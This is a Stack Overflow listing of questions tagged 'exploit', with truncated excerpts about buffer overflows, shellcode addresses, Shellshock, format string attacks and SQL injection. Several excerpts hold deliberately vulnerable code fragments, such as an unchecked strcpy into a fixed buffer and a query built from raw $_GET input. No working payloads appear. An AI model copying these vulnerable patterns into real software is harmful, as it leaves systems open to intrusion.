Stack Overflow
Stack Overflow

Questions tagged [exploit]

An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur. This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.

790 questions
3
votes
2 answers

How are clientside security vulnerabilities generally discovered?

I mean in operating systems or their applications. The only way I can think of is examine binaries for the use of dangerous functions like strcpy(), and then try to exploit those. Though with compiler improvements like Visual Studio's /GS switch…
Jehjoa
  • 551
  • 8
  • 23
3
votes
1 answer

Write buffer overflow exploit -- how to figure out the address of the shellcode?

When writing buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the shellcode. So that when my input array overflows,…
ccczhang
  • 67
  • 1
  • 2
  • 8
3
votes
1 answer

How to detect/prevent third party code dialling home?

Context: Third-party code is common to any open-source CMS e.g WordPress plugins and themes. I've recently encountered articles online regarding plugins/themes sending information to authors. My concern: I cannot tell WHEN a plugin/theme is sending…
Clarus Dignus
  • 3,847
  • 3
  • 31
  • 57
3
votes
0 answers

What is a specific example of how the Shellshock Bash bug could be exploited?

I read some articles (article1, article2, article3) about the Shellshock Bash bug (CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the…
Rob Bednark
  • 25,981
  • 23
  • 80
  • 125
3
votes
1 answer

Buffer overflow - Program terminated with signal SIGSEGV

I'm learning buffer overflow exploiting. I wrote a vulnerable program like this: #include #include main(int argc, char *argv[]) { char buffer[80]; strcpy(buffer, argv[1]); return 1; } Very simple program. The idea…
Peter
  • 141
  • 1
  • 1
  • 5
3
votes
2 answers

Where does the "payload" in the "payload.encoded" come from in a metasploit's exploit?

I am analyzing a metasploit exploit here and I am trying to figure out where does the payload in payload.encoded come from on line 358. I am newbie to exploit development but basic programming rules say that payload should be initialized before…
TheRookierLearner
  • 3,643
  • 8
  • 35
  • 53
3
votes
3 answers

PHP magic_quotes_gpc vulnerability

I've been assigned to one of my company's legacy webapps, and after a day or two of poking around the source, I've found an SQL injection vector similar to the following: mysql_query("SELECT * FROM foo WHERE bar='" . $_GET['baz'] . "'"); I've tried…
James K.
  • 31
  • 1
  • 2
3
votes
2 answers

How to find the in-memory address of a specific instruction in a DLL

How can I find the in-memory address (for exploit writing) of a specific instruction? Specifically, I'm looking for a call ebp instruction in user32.dll on Windows XP with no Service Pack whose address I can point EIP to. I have both Immunity…
Freedom_Ben
  • 11,247
  • 10
  • 69
  • 89
3
votes
3 answers

Python security: Danger of uncollected variables out of scope

I have a method in a class which decrypts a variable, and returns it. I remove the returned variable with "del" after use. What is the danger of these garbage values being accessed...and how can I best protect myself from them? Here is the…
RightmireM
  • 2,381
  • 2
  • 24
  • 42
3
votes
2 answers

Rails app exploited, how to find which exploit?

I've received a mail from somebody who pretends to have hacked my server, giving a few info about the server, and asking me to pay if I don't want the data to be posted online. All the apps on the server are rails apps, and some of them were not up…
Seb K
  • 31
  • 1
3
votes
1 answer

Buffer overflow on remote server

I'm a computer security student and I'm doing a project about remote buffer overflows. I developed a vulnerable server in C, with an unsafe use of strncpy function which actually copies 1024 bytes on a 512-bytes buffer, and an exploit to test the…
manco
  • 31
  • 1
  • 2
3
votes
1 answer

In Linux, does the location of an executable affect how the setuid bit is interpreted?

In a Linux system, does the permissions of the directory in which a setuid program resides affect how the kernel launches the process? The reason I ask is that when I compiled an identical setuid program in two different directories, it only…
Mr. Shickadance
  • 5,283
  • 9
  • 45
  • 61
3
votes
1 answer

Format string attack in printf

#include int main() { char s[200] int a=123; int b=&a; scanf("%50s",s); printf(s); if (a==31337) func(); } The aim is to execute a format string attack - to execute func() by inputting a string. I tried to…
Jaroszewski Piotr
  • 353
  • 1
  • 3
  • 11
3
votes
1 answer

Disable backtrace

I'm training on heap overflow exploit on my backtrack 5 laptop. However, backtrack seems to have a protection against these attacks. Here is what I get when i try to corrupt meta data of malloc's allocated chunks. Starting program:…
joub
  • 117
  • 10
3
votes
2 answers

How to guard against Resource exhaustion and other vulnerabilities?

We happened to use IBM appscan http://www-01.ibm.com/software/awdtools/appscan/ against our java codebase, and it returned around 3000 high severity vulnerabilities. Most of them happen to be System Information Leak, which it thinks is happening…
roymustang86
  • 8,054
  • 22
  • 70
  • 101
1 2 3
52 53